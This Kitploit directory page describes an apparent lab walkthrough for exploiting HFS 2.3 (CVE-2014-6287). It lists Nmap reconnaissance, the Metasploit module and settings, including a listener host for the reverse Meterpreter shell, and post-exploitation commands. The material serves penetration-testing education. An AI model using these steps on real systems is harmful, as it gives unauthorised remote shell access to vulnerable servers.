Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
HFS_EXPLOIT_PROJECT — Metasploit RCE on HFS 2.3 - CVE-2014-62 | Kitploit
Tools/GitHubGitHub/sage954526/hfs_exploit_project
Exploit FrameworksVulnerability AnalysisWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubsage954526/hfs_exploit_project

HFS_EXPLOIT_PROJECT

Metasploit RCE on HFS 2.3 - CVE-2014-62

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

HFS_EXPLOIT_PROJECT

Metasploit RCE on HFS 2.3 - CVE-2014-62

🔖 Title of the Project

root@kitploit:~
> Remote Code Execution via HTTP File Server (HFS 2.3)

⚙ Tools Used • Kali Linux • Nmap • Metasploit • Target: HFS 2.3 on Windows 7

🔐 Vulnerability Details • Name: CVE-2014-6287 • Type: Remote Code Execution • Cause: Unvalidated input in HFS scripting • Impact: Unauthenticated shell access

🔍 Methodology (Step-by-Step)

🔹 Step 1: Information Gathering (Nmap)

root@kitploit:~
•    nmap -sV demo.ine.local (ip of target) 
•    open port found : 80
•    service : rejetto HTTP file server 2.3

Nmap Scan

Nmap

🔹 Step 2: Exploitation (Metasploit)

root@kitploit:~
• Msfconsole
• Search for HFS or rejetto
• use exploit/windows/http/rejetto_hfs_exec
• set RHOST 192.168.1.100
• set RPORT 80
• set LHOST 192.168.1.101
• run

Exploit Setup

Exploit Exploit

🔹 Step 3: Post-Exploitation

after run you will get meterpreter session use command : shell

• whoami • ipconfig • dir

Shell Access

Shell

Shell**

Download Tool